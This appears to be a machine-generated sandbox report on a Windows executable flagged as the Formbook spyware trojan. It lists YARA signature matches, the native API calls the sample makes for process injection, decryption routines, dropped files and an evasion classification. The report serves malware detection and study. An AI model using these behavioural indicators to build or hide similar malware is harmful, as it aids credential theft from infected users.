Source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ekte.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0042C483 NtClose, 8_2_0042C483
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B07AC NtCreateMutant,LdrInitializeThunk, 8_2_009B07AC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AF9F0 NtClose,LdrInitializeThunk, 8_2_009AF9F0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_009AFAE8
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_009AFB68
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_009AFDC0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B00C4 NtCreateFile, 8_2_009B00C4
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B0048 NtProtectVirtualMemory, 8_2_009B0048
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B0078 NtResumeThread, 8_2_009B0078
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B0060 NtQuerySection, 8_2_009B0060
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B01D4 NtSetValueKey, 8_2_009B01D4
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B010C NtOpenDirectoryObject, 8_2_009B010C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B0C40 NtGetContextThread, 8_2_009B0C40
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B10D0 NtOpenProcessToken, 8_2_009B10D0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B1148 NtOpenThread, 8_2_009B1148
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AF8CC NtWaitForSingleObject, 8_2_009AF8CC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AF900 NtReadFile, 8_2_009AF900
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AF938 NtWriteFile, 8_2_009AF938
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B1930 NtSetContextThread, 8_2_009B1930
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFAB8 NtQueryValueKey, 8_2_009AFAB8
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFAD0 NtAllocateVirtualMemory, 8_2_009AFAD0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFA20 NtQueryInformationFile, 8_2_009AFA20
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFA50 NtEnumerateValueKey, 8_2_009AFA50
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFBB8 NtQueryInformationToken, 8_2_009AFBB8
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFBE8 NtQueryVirtualMemory, 8_2_009AFBE8
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFB50 NtCreateKey, 8_2_009AFB50
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFC90 NtUnmapViewOfSection, 8_2_009AFC90
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFC30 NtOpenProcess, 8_2_009AFC30
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFC48 NtSetInformationFile, 8_2_009AFC48
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFC60 NtMapViewOfSection, 8_2_009AFC60
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFD8C NtDelayExecution, 8_2_009AFD8C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009B1D80 NtSuspendThread, 8_2_009B1D80
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFD5C NtEnumerateKey, 8_2_009AFD5C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFEA0 NtReadVirtualMemory, 8_2_009AFEA0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFED0 NtAdjustPrivilegesToken, 8_2_009AFED0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFE24 NtWriteVirtualMemory, 8_2_009AFE24
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFFB4 NtCreateSection, 8_2_009AFFB4
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFFFC NtCreateProcessEx, 8_2_009AFFFC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009AFF34 NtQueueApcThread, 8_2_009AFF34
Detected potential crypto function
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001B44D8 0_2_001B44D8
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001B04EC 0_2_001B04EC
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BA6B0 0_2_001BA6B0
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BD2BD 0_2_001BD2BD
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BD2D8 0_2_001BD2D8
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001B44C9 0_2_001B44C9
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BE6D0 0_2_001BE6D0
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BD710 0_2_001BD710
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001B185A 0_2_001B185A
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001B2A68 0_2_001B2A68
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BEB08 0_2_001BEB08
Source: C:\Users\user\Desktop\ekte.exe Code function: 0_2_001BDB48 0_2_001BDB48
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00418473 8_2_00418473
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00403060 8_2_00403060
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00401000 8_2_00401000
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040118B 8_2_0040118B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00401190 8_2_00401190
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0042EAA3 8_2_0042EAA3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00401300 8_2_00401300
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_004024E0 8_2_004024E0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040FCAC 8_2_0040FCAC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040FCB3 8_2_0040FCB3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00416643 8_2_00416643
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040FED3 8_2_0040FED3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040DEF7 8_2_0040DEF7
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040DF49 8_2_0040DF49
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_0040DF53 8_2_0040DF53
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009BE0C6 8_2_009BE0C6
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009BE2E9 8_2_009BE2E9
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A663BF 8_2_00A663BF
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009E63DB 8_2_009E63DB
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C2305 8_2_009C2305
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A0A37B 8_2_00A0A37B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4443E 8_2_00A4443E
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A405E3 8_2_00A405E3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009DC5F0 8_2_009DC5F0
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A06540 8_2_00A06540
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C4680 8_2_009C4680
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009CE6C1 8_2_009CE6C1
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A62622 8_2_00A62622
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A0A634 8_2_00A0A634
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009CC7BC 8_2_009CC7BC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009CC85C 8_2_009CC85C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009E286D 8_2_009E286D
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A6098E 8_2_00A6098E
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C29B2 8_2_009C29B2
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A549F5 8_2_00A549F5
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009D69FE 8_2_009D69FE
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A0C920 8_2_00A0C920
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A6CBA4 8_2_00A6CBA4
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A46BCB 8_2_00A46BCB
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A62C9C 8_2_00A62C9C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4AC5E 8_2_00A4AC5E
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009F0D3B 8_2_009F0D3B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009CCD5B 8_2_009CCD5B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009F2E2F 8_2_009F2E2F
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009DEE4C 8_2_009DEE4C
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A5CFB1 8_2_00A5CFB1
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A32FDC 8_2_00A32FDC
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009D0F3F 8_2_009D0F3F
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009ED005 8_2_009ED005
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009D905A 8_2_009D905A
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A3D06D 8_2_00A3D06D
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C3040 8_2_009C3040
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4D13F 8_2_00A4D13F
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A61238 8_2_00A61238
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009BF3CF 8_2_009BF3CF
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C7353 8_2_009C7353
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009D1489 8_2_009D1489
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009F5485 8_2_009F5485
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009FD47D 8_2_009FD47D
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A635DA 8_2_00A635DA
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009C351F 8_2_009C351F
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4579A 8_2_00A4579A
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009F57C3 8_2_009F57C3
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A5771D 8_2_00A5771D
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A5F8EE 8_2_00A5F8EE
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A3F8C4 8_2_00A3F8C4
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4394B 8_2_00A4394B
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A45955 8_2_00A45955
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A73A83 8_2_00A73A83
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009BFBD7 8_2_009BFBD7
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4DBDA 8_2_00A4DBDA
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009E7B00 8_2_009E7B00
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A5FDDD 8_2_00A5FDDD
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_00A4BF14 8_2_00A4BF14
Source: C:\Users\user\Desktop\ekte.exe Code function: 8_2_009EDF7C 8_2_009EDF7C
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_002404EC 10_2_002404EC
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_002444D8 10_2_002444D8
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024A6B0 10_2_0024A6B0
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024D2BD 10_2_0024D2BD
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024D2D8 10_2_0024D2D8
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_002444C9 10_2_002444C9
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024E6D0 10_2_0024E6D0
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024D710 10_2_0024D710
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024185A 10_2_0024185A
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_00242A68 10_2_00242A68
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024EB08 10_2_0024EB08
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 10_2_0024DB48 10_2_0024DB48
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E87B71 19_2_61E87B71
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E20095 19_2_61E20095
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E1606A 19_2_61E1606A
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E51001 19_2_61E51001
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E3A382 19_2_61E3A382
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E2C2C7 19_2_61E2C2C7
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E282B2 19_2_61E282B2
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E245F1 19_2_61E245F1
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E224B0 19_2_61E224B0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E3D427 19_2_61E3D427
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E6E7E0 19_2_61E6E7E0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E427CB 19_2_61E427CB
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E3E726 19_2_61E3E726
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E2F9A3 19_2_61E2F9A3
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E448FF 19_2_61E448FF
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E1BBF2 19_2_61E1BBF2
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E4DBBA 19_2_61E4DBBA
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E42D37 19_2_61E42D37
Source: C:\Windows\SysWOW64\findstr.exe Code function: 19_2_61E4EE34 19_2_61E4EE34
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\sqlite3.dll 5EA67D6B7F67301CA214AF511740F26B9E6CC9E16B2C0EC7BBA071D05B9BDE78
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\ekte.exe Code function: String function: 009BDF5C appears 137 times
Source: C:\Users\user\Desktop\ekte.exe Code function: String function: 00A03F92 appears 132 times
Source: C:\Users\user\Desktop\ekte.exe Code function: String function: 009BE2A8 appears 60 times
Source: C:\Users\user\Desktop\ekte.exe Code function: String function: 00A0373B appears 253 times
Source: C:\Users\user\Desktop\ekte.exe Code function: String function: 00A2F970 appears 84 times
PE / OLE file has an invalid certificate
Source: ekte.exe Static PE information: invalid certificate
PE file contains more sections than normal
Source: sqlite3.dll.19.dr Static PE information: Number of sections : 18 > 10
Sample file is different than original file name gathered from version info
Source: ekte.exe, 00000000.00000000.359787899.0000000001482000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameiKZ.exe@ vs ekte.exe
Source: ekte.exe, 00000000.00000002.383376201.00000000052AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesctasks.exej% vs ekte.exe
Source: ekte.exe, 00000000.00000002.375617011.00000000006D4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ekte.exe
Source: ekte.exe, 00000000.00000002.383837466.00000000067B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs ekte.exe
Source: ekte.exe, 00000000.00000002.376498845.0000000002891000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs ekte.exe
Source: ekte.exe, 00000008.00000002.418645615.0000000000AA0000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ekte.exe
Source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFINDSTR.EXEj% vs ekte.exe
Source: ekte.exe, 00000008.00000002.417831173.00000000008D7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFINDSTR.EXEj% vs ekte.exe
Source: ekte.exe Binary or memory string: OriginalFilenameiKZ.exe@ vs ekte.exe
Uses 32bit PE files
Source: ekte.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: ekte.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: eFDiSxeTfjUqTk.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.SetAccessControl
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ekte.exe.3ae7ae0.5.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.AddAccessRule
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.SetAccessControl
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.AddAccessRule
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.SetAccessControl
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.ekte.exe.67b0000.6.raw.unpack, fQtca1ae8ISaTu4jS6.cs Security API names: _0020.AddAccessRule
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.ekte.exe.3b6fb00.4.raw.unpack, GU2SbFu6vnjS2UV3A6.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/19@12/6
Source: C:\Users\user\Desktop\ekte.exe File created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DAT Jump to behavior
